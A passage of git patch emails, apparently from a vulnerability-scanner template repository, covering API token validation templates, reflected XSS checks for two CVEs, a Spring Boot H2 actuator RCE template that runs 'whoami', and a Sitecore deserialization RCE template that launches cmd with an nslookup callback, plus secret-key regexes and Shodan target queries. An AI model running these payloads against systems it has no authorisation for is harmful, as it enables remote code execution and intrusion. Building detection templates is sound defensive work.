api-sonarcloud.yaml} | 4 ++-- token-spray/{spotify.yaml => api-spotify.yaml} | 14 +++++++++----- token-spray/{stripe.yaml => api-stripe.yaml} | 12 ++++++++---- token-spray/{tink.yaml => api-tink.yaml} | 0 token-spray/{tinypng.yaml => api-tinypng.yaml} | 0 token-spray/{twitter.yaml => api-twitter.yaml} | 7 ++++--- .../{visualstudio.yaml => api-visualstudio.yaml} | 8 +++++--- token-spray/{wakatime.yaml => api-wakatime.yaml} | 13 ++++++++----- token-spray/{weglot.yaml => api-weglot.yaml} | 0 token-spray/{youtube.yaml => api-youtube.yaml} | 9 +++------ 15 files changed, 51 insertions(+), 34 deletions(-) rename token-spray/{dropbox.yaml => api-dropbox.yaml} (75%) rename token-spray/{facebook.yaml => api-facebook.yaml} (100%) rename token-spray/{fontawesome.yaml => api-fontawesome.yaml} (86%) rename token-spray/{fortitoken-cloud.yaml => api-fortitoken-cloud.yaml} (100%) rename token-spray/{github.yaml => api-github.yaml} (84%) rename token-spray/{sonarcloud.yaml => api-sonarcloud.yaml} (93%) rename token-spray/{spotify.yaml => api-spotify.yaml} (61%) rename token-spray/{stripe.yaml => api-stripe.yaml} (70%) rename token-spray/{tink.yaml => api-tink.yaml} (100%) rename token-spray/{tinypng.yaml => api-tinypng.yaml} (100%) rename token-spray/{twitter.yaml => api-twitter.yaml} (82%) rename token-spray/{visualstudio.yaml => api-visualstudio.yaml} (82%) rename token-spray/{wakatime.yaml => api-wakatime.yaml} (67%) rename token-spray/{weglot.yaml => api-weglot.yaml} (100%) rename token-spray/{youtube.yaml => api-youtube.yaml} (80%) diff --git a/token-spray/dropbox.yaml b/token-spray/api-dropbox.yaml similarity index 75% rename from token-spray/dropbox.yaml rename to token-spray/api-dropbox.yaml index 339837160e..cc14c60421 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/api-dropbox.yaml @@ -16,6 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"account_id":' + - '"email":' + condition: and diff --git a/token-spray/facebook.yaml b/token-spray/api-facebook.yaml similarity index 100% rename from token-spray/facebook.yaml rename to token-spray/api-facebook.yaml diff --git a/token-spray/fontawesome.yaml b/token-spray/api-fontawesome.yaml similarity index 86% rename from token-spray/fontawesome.yaml rename to token-spray/api-fontawesome.yaml index 10ec8d5ff5..3a990014df 100644 --- a/token-spray/fontawesome.yaml +++ b/token-spray/api-fontawesome.yaml @@ -24,5 +24,6 @@ requests: - type: word part: body words: - - "No active API token" - negative: true + - '"access_token":' + - '"scopes":' + condition: and diff --git a/token-spray/fortitoken-cloud.yaml b/token-spray/api-fortitoken-cloud.yaml similarity index 100% rename from token-spray/fortitoken-cloud.yaml rename to token-spray/api-fortitoken-cloud.yaml diff --git a/token-spray/github.yaml b/token-spray/api-github.yaml similarity index 84% rename from token-spray/github.yaml rename to token-spray/api-github.yaml index 4722dfe6d3..764b42e28c 100644 --- a/token-spray/github.yaml +++ b/token-spray/api-github.yaml @@ -19,4 +19,6 @@ requests: - type: word part: body words: - - 'login' + - '"login":' + - '"avatar_url":' + condition: and diff --git a/token-spray/sonarcloud.yaml b/token-spray/api-sonarcloud.yaml similarity index 93% rename from token-spray/sonarcloud.yaml rename to token-spray/api-sonarcloud.yaml index aed9d1760f..97831db0bd 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/api-sonarcloud.yaml @@ -3,8 +3,8 @@ id: api-sonarcloud info: name: SonarCloud API Test author: zzeitlin - reference: https://sonarcloud.io/web_api/api/authentication severity: info + reference: https://sonarcloud.io/web_api/api/authentication tags: token-spray,sonarcloud self-contained: true @@ -19,4 +19,4 @@ requests: - type: word part: body words: - - 'true' + - '{"valid": true}' diff --git a/token-spray/spotify.yaml b/token-spray/api-spotify.yaml similarity index 61% rename from token-spray/spotify.yaml rename to token-spray/api-spotify.yaml index 01f1d80084..ee518e36b4 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/api-spotify.yaml @@ -3,19 +3,23 @@ id: api-spotify info: name: Spotify API Test author: zzeitlin - reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ tags: token-spray,spotify self-contained: true requests: - method: GET path: - - "https://api.spotify.com/v1/me" + - "https://api.spotify.com/v1/me/player/devices" headers: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/token-spray/stripe.yaml b/token-spray/api-stripe.yaml similarity index 70% rename from token-spray/stripe.yaml rename to token-spray/api-stripe.yaml index 50e8979aa7..d06b38bd8c 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/api-stripe.yaml @@ -3,8 +3,8 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/token-spray/tink.yaml b/token-spray/api-tink.yaml similarity index 100% rename from token-spray/tink.yaml rename to token-spray/api-tink.yaml diff --git a/token-spray/tinypng.yaml b/token-spray/api-tinypng.yaml similarity index 100% rename from token-spray/tinypng.yaml rename to token-spray/api-tinypng.yaml diff --git a/token-spray/twitter.yaml b/token-spray/api-twitter.yaml similarity index 82% rename from token-spray/twitter.yaml rename to token-spray/api-twitter.yaml index ec654b2782..ce6de967e8 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/api-twitter.yaml @@ -3,8 +3,8 @@ id: api-twitter info: name: Twitter API Test author: zzeitlin - reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index severity: info + reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index tags: token-spray,twitter self-contained: true @@ -19,5 +19,6 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"account_name":' + - '"subscriptions_count_all":' + condition: and diff --git a/token-spray/visualstudio.yaml b/token-spray/api-visualstudio.yaml similarity index 82% rename from token-spray/visualstudio.yaml rename to token-spray/api-visualstudio.yaml index e7c0a0a2f8..a3440fdb9a 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/api-visualstudio.yaml @@ -3,8 +3,8 @@ id: api-visualstudio info: name: Visual Studio API Test author: zzeitlin - reference: https://openapi.appcenter.ms/ severity: info + reference: https://openapi.appcenter.ms/ tags: token-spray,visualstudio,microsoft self-contained: true @@ -19,6 +19,8 @@ requests: matchers: - type: word part: body - negative: true words: - - 'Unauthorized' + - '"id":' + - '"description":' + - '"owner":' + condition: and diff --git a/token-spray/wakatime.yaml b/token-spray/api-wakatime.yaml similarity index 67% rename from token-spray/wakatime.yaml rename to token-spray/api-wakatime.yaml index 7237446fce..07755c952b 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/api-wakatime.yaml @@ -3,8 +3,8 @@ id: api-wakatime info: name: WakaTime CI API Test author: zzeitlin - reference: https://wakatime.com/developers severity: info + reference: https://wakatime.com/developers tags: token-spray,wakatime self-contained: true @@ -14,7 +14,10 @@ requests: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"data":' + - '"seconds":' + - '"is_up_to_date":' + condition: and diff --git a/token-spray/weglot.yaml b/token-spray/api-weglot.yaml similarity index 100% rename from token-spray/weglot.yaml rename to token-spray/api-weglot.yaml diff --git a/token-spray/youtube.yaml b/token-spray/api-youtube.yaml similarity index 80% rename from token-spray/youtube.yaml rename to token-spray/api-youtube.yaml index 8c1384579b..be1531a453 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/api-youtube.yaml @@ -13,13 +13,10 @@ requests: path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - matchers-condition: or matchers: - type: word part: body words: - - 'quotaExceeded' - - - type: status - status: - - 200 + - '"kind":' + - '"pageInfo":' + condition: and \ No newline at end of file From 3cb7dac7eee1147ae03a76624407ad1f25a6dc37 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 2 Nov 2021 18:12:45 +0700 Subject: [PATCH 3356/4083] Create api-micro-user-service.yaml --- token-spray/api-micro-user-service.yaml | 30 +++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 token-spray/api-micro-user-service.yaml diff --git a/token-spray/api-micro-user-service.yaml b/token-spray/api-micro-user-service.yaml new file mode 100644 index 0000000000..a42ae30d5f --- /dev/null +++ b/token-spray/api-micro-user-service.yaml @@ -0,0 +1,30 @@ +id: api-micro-user-service + +info: + name: Micro User Service API Test + author: daffainfo + severity: info + reference: + - https://m3o.com/user + - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Micro%20User%20Service.md + tags: token-spray,micro-user-service + +self-contained: true +requests: + - raw: + - | + POST /v1/user/Read HTTP/1.1 + Host: api.m3o.com + Content-Type: application/json + Authorization: Bearer {{token}} + Content-Length: 21 + + { + "id": "usrid-1" + } + + matchers: + - type: status + negative: true + status: + - 401 From cd448cf12f6117406c4a38e5a436a9127216e0eb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 2 Nov 2021 18:15:19 +0700 Subject: [PATCH 3357/4083] Update api-micro-user-service.yaml --- token-spray/api-micro-user-service.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/token-spray/api-micro-user-service.yaml b/token-spray/api-micro-user-service.yaml index a42ae30d5f..8319c3f9dd 100644 --- a/token-spray/api-micro-user-service.yaml +++ b/token-spray/api-micro-user-service.yaml @@ -22,7 +22,6 @@ requests: { "id": "usrid-1" } - matchers: - type: status negative: true From e32a807a8eab67851c64fd9cf0fac76be84a1365 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 2 Nov 2021 18:24:31 +0700 Subject: [PATCH 3358/4083] Update matcher --- token-spray/api-micro-user-service.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/token-spray/api-micro-user-service.yaml b/token-spray/api-micro-user-service.yaml index 8319c3f9dd..dcbb70bf21 100644 --- a/token-spray/api-micro-user-service.yaml +++ b/token-spray/api-micro-user-service.yaml @@ -23,7 +23,11 @@ requests: "id": "usrid-1" } matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"username":' + - '"email":' + - '"created":' + - '"updated":' + condition: and From b00383dd605e53b1ec0e97ef8e51bbe05b757713 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 2 Nov 2021 16:55:55 +0530 Subject: [PATCH 3359/4083] misc update --- file/logs/suspicious-sql-error-messages.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/file/logs/suspicious-sql-error-messages.yaml b/file/logs/suspicious-sql-error-messages.yaml index b1857d3a3c..b822c58af5 100644 --- a/file/logs/suspicious-sql-error-messages.yaml +++ b/file/logs/suspicious-sql-error-messages.yaml @@ -17,16 +17,19 @@ file: part: body regex: - 'quoted string not properly terminated' + - type: regex name: mysql part: body regex: - 'You have an error in your SQL syntax' + - type: regex name: sql_server part: body regex: - 'Unclosed quotation mark' + - type: regex name: sqlite part: body From 5e774b4e9ba2a9393b549a6f04730b88c3e5d682 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Nov 2021 23:16:22 +0530 Subject: [PATCH 3360/4083] Create CVE-2021-38704.yaml --- cves/2021/CVE-2021-38704.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-38704.yaml diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml new file mode 100644 index 0000000000..df25dc29de --- /dev/null +++ b/cves/2021/CVE-2021-38704.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-38704 + +info: + name: ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS) + author: alph4byt3 + severity: medium + description: Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. + reference: + - https://github.com/sudonoodle/CVE-2021-38704 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 + tags: xss,cve,cve2021,cliniccases + +requests: + - method: GET + path: + - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 19ca42a3d62fd7b5f22d793e1d56743bd3c9e232 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Nov 2021 23:23:11 +0530 Subject: [PATCH 3361/4083] Update CVE-2021-38704.yaml --- cves/2021/CVE-2021-38704.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index df25dc29de..1fe9837de0 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml @@ -8,6 +8,8 @@ info: reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 + metadata: + shodan-query: 'title:"Welcome to Movable Type"' tags: xss,cve,cve2021,cliniccases requests: From 3541fb575443b6341e23e99c012d5ce0549135c0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Nov 2021 23:25:17 +0530 Subject: [PATCH 3362/4083] Update CVE-2021-38704.yaml --- cves/2021/CVE-2021-38704.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index 1fe9837de0..75d50441b4 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml @@ -10,6 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 metadata: shodan-query: 'title:"Welcome to Movable Type"' + shodan-query: html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases requests: From 94c49907cecfda2a3bb272bc9b4e1c776e15a61c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 2 Nov 2021 23:35:14 +0530 Subject: [PATCH 3363/4083] Update CVE-2021-38704.yaml --- cves/2021/CVE-2021-38704.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index 75d50441b4..d6b570b91e 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml @@ -9,8 +9,7 @@ info: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 metadata: - shodan-query: 'title:"Welcome to Movable Type"' - shodan-query: html:"/cliniccases/" + shodan-query: 'title:"Welcome to Movable Type"','html:"/cliniccases/"' tags: xss,cve,cve2021,cliniccases requests: From 36bda42c27569ac631fa3816643495967f616663 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 01:49:51 +0530 Subject: [PATCH 3364/4083] misc update --- cves/2021/CVE-2021-38704.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index d6b570b91e..c6a32b8562 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml @@ -9,7 +9,7 @@ info: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 metadata: - shodan-query: 'title:"Welcome to Movable Type"','html:"/cliniccases/"' + shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases requests: @@ -20,9 +20,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header From ba5d199dbb67d9a116261f12db9c384f60e47bd2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Nov 2021 20:23:01 +0000 Subject: [PATCH 3365/4083] Auto Generated CVE annotations [Tue Nov 2 20:23:01 UTC 2021] :robot: --- cves/2021/CVE-2021-38704.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml index c6a32b8562..9f4942c70c 100644 --- a/cves/2021/CVE-2021-38704.yaml +++ b/cves/2021/CVE-2021-38704.yaml @@ -11,6 +11,11 @@ info: metadata: shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38704 + cwe-id: CWE-79 requests: - method: GET From e2b4d2b29cc66402d0576b927772634f0da13018 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 02:54:23 +0530 Subject: [PATCH 3366/4083] misc update --- .../springboot/springboot-h2-db-rce.yaml | 33 +++++++++---------- 1 file changed, 15 insertions(+), 18 deletions(-) diff --git a/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml index 4dc41f4bc9..7d2edb3f34 100644 --- a/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -5,36 +5,33 @@ info: author: dwisiswant0 severity: critical tags: springboot,rce - - # Payload taken from @pyn3rd (Twitter), see reference[2]. reference: - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce + metadata: + shodan-query: http.favicon.hash:116323821 requests: - - method: POST - path: - - "{{BaseURL}}/actuator/env" - headers: - Content-Type: "application/json" - body: | - { - "name": "spring.datasource.hikari.connection-init-sql", - "value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()" - } + - raw: + - | + POST /actuator/env HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "name":"spring.datasource.hikari.connection-test-query", + "value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');" + } + matchers-condition: and matchers: - type: status status: - 200 + - type: word - words: - - "\"spring.datasource.hikari.connection-init-sql\":\"" - condition: and part: body - - type: word words: - - "application/vnd.spring-boot.actuator" - part: header \ No newline at end of file + - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT' \ No newline at end of file From 2c8314ef2bf3b065b79aef6e5380db894b944bf9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 3 Nov 2021 11:27:19 +0530 Subject: [PATCH 3367/4083] Update api-micro-user-service.yaml --- token-spray/api-micro-user-service.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/token-spray/api-micro-user-service.yaml b/token-spray/api-micro-user-service.yaml index dcbb70bf21..a50d5c1436 100644 --- a/token-spray/api-micro-user-service.yaml +++ b/token-spray/api-micro-user-service.yaml @@ -13,7 +13,7 @@ self-contained: true requests: - raw: - | - POST /v1/user/Read HTTP/1.1 + POST https://api.m3o.com/v1/user/Read HTTP/1.1 Host: api.m3o.com Content-Type: application/json Authorization: Bearer {{token}} @@ -22,6 +22,7 @@ requests: { "id": "usrid-1" } + matchers: - type: word part: body From fd9e89e0db5c2fcbdd69b1f39258d428dbe6cdf0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 3 Nov 2021 11:36:30 +0530 Subject: [PATCH 3368/4083] Create CVE-2018-18570.yaml --- cves/2018/CVE-2018-18570.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018-18570.yaml diff --git a/cves/2018/CVE-2018-18570.yaml b/cves/2018/CVE-2018-18570.yaml new file mode 100644 index 0000000000..617f1a3137 --- /dev/null +++ b/cves/2018/CVE-2018-18570.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-18570 +info: + name: Cross-Site Scripting on Planon web application + author: emadshanab + severity: medium + description: Planon before Live Build 41 has XSS + reference: + - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 + tags: xss,cve,cve2018,planon + +requests: + - method: GET + path: + - '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header From e70531ebca54a8d628dee37ff42b7354a4ea9a28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Nov 2021 06:21:45 +0000 Subject: [PATCH 3369/4083] Auto Generated CVE annotations [Wed Nov 3 06:21:45 UTC 2021] :robot: --- cves/2018/CVE-2018-18570.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-18570.yaml b/cves/2018/CVE-2018-18570.yaml index 617f1a3137..51249a06a8 100644 --- a/cves/2018/CVE-2018-18570.yaml +++ b/cves/2018/CVE-2018-18570.yaml @@ -8,6 +8,11 @@ info: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 tags: xss,cve,cve2018,planon + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18570 + cwe-id: CWE-79 requests: - method: GET From f7f4e5546f7b2a51148846dec3e2f45a4e6bc0ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 3 Nov 2021 11:52:13 +0530 Subject: [PATCH 3370/4083] Create branch-key.yaml --- file/keys/branch-key.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 file/keys/branch-key.yaml diff --git a/file/keys/branch-key.yaml b/file/keys/branch-key.yaml new file mode 100644 index 0000000000..1b63de346f --- /dev/null +++ b/file/keys/branch-key.yaml @@ -0,0 +1,17 @@ +id: branch-key + +info: + name: Branch.io Live Key + author: 0xh7ml + severity: info + reference: https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "key_live_.{32}" From dac6028b7eb93a3c9ce99ef9fc251b0e9441c770 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 15:41:08 +0530 Subject: [PATCH 3371/4083] misc update --- miscellaneous/detect-dns-over-https.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/miscellaneous/detect-dns-over-https.yaml b/miscellaneous/detect-dns-over-https.yaml index 65d9a2bf23..8ac33de078 100644 --- a/miscellaneous/detect-dns-over-https.yaml +++ b/miscellaneous/detect-dns-over-https.yaml @@ -21,11 +21,13 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/dns-message" - part: header + - type: regex + part: header regex: - "(C|c)ontent-(L|l)ength: 49" - part: header From c06cc9f6900304afa5bf3673b7add344fdac07fe Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 16:52:25 +0530 Subject: [PATCH 3372/4083] Added Sitecore Experience Platform Pre-Auth RCE --- vulnerabilities/sitecore-pre-auth-rce.yaml | 104 +++++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 vulnerabilities/sitecore-pre-auth-rce.yaml diff --git a/vulnerabilities/sitecore-pre-auth-rce.yaml b/vulnerabilities/sitecore-pre-auth-rce.yaml new file mode 100644 index 0000000000..940242ff05 --- /dev/null +++ b/vulnerabilities/sitecore-pre-auth-rce.yaml @@ -0,0 +1,104 @@ +id: sitecore-pre-auth-rce + +info: + name: Sitecore Experience Platform Pre-Auth RCE + author: pdteam + severity: critical + description: This issue is related to a remote code execution vulnerability through insecure deserialization in the Report.ashx file. This file was used to drive the Executive Insight Dashboard (of Silverlight report) that was deprecated in 8.0 Initial Release. + tags: rce,sitecore,deserialization,oast + reference: + - https://blog.assetnote.io/2021/11/02/sitecore-rce/ + - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 + +requests: + - raw: + - | + POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + + foo + + + + 2 + + <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" + xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" + xmlns:a="http://schemas.datacontract.org/2004/07/System"> + + mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + + Compare + + + System.String + System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] + + Start + + System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + System.Diagnostics.Process + System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] + + + + + + System.Diagnostics.Process Start(System.String, System.String) + System.Diagnostics.Process Start(System.String, System.String) + 8 + + + + + + + Int32 Compare(System.String, System.String) + System.Int32 Compare(System.String, System.String) + 8 + + + + + 2 + + /c nslookup {{interactsh-url}} + cmd + + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" + + - type: word + part: body + words: + - "System.ArgumentNullException" \ No newline at end of file From be65921cc367c67d4f2a818608a4b1fd23061e21 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 17:11:48 +0530 Subject: [PATCH 3373/4083] Added remediation information --- vulnerabilities/sitecore-pre-auth-rce.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/vulnerabilities/sitecore-pre-auth-rce.yaml b/vulnerabilities/sitecore-pre-auth-rce.yaml index 940242ff05..aeaeae6a9b 100644 --- a/vulnerabilities/sitecore-pre-auth-rce.yaml +++ b/vulnerabilities/sitecore-pre-auth-rce.yaml @@ -9,6 +9,13 @@ info: reference: - https://blog.assetnote.io/2021/11/02/sitecore-rce/ - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776 + remediation: + For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions- + - Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher. + - Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. + - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. + - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. + For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. requests: - raw: From 67f3530dbfba1e43f8a2cfb663e61467a725c567 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 17:27:53 +0530 Subject: [PATCH 3374/4083] Added meta info --- vulnerabilities/sitecore-pre-auth-rce.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/sitecore-pre-auth-rce.yaml b/vulnerabilities/sitecore-pre-auth-rce.yaml index aeaeae6a9b..270f3d18f2 100644 --- a/vulnerabilities/sitecore-pre-auth-rce.yaml +++ b/vulnerabilities/sitecore-pre-auth-rce.yaml @@ -16,6 +16,8 @@ info: - Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below. - For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances. + metadata: + shodan-query: http.title:"SiteCore" requests: - raw: From 6025bac3a1174a40320c496e6e79a0eb7ff5cfa5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Nov 2021 21:13:02 +0530 Subject: [PATCH 3375/4083] Create sitecore-default-page.yaml --- technologies/sitecore-default-page.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 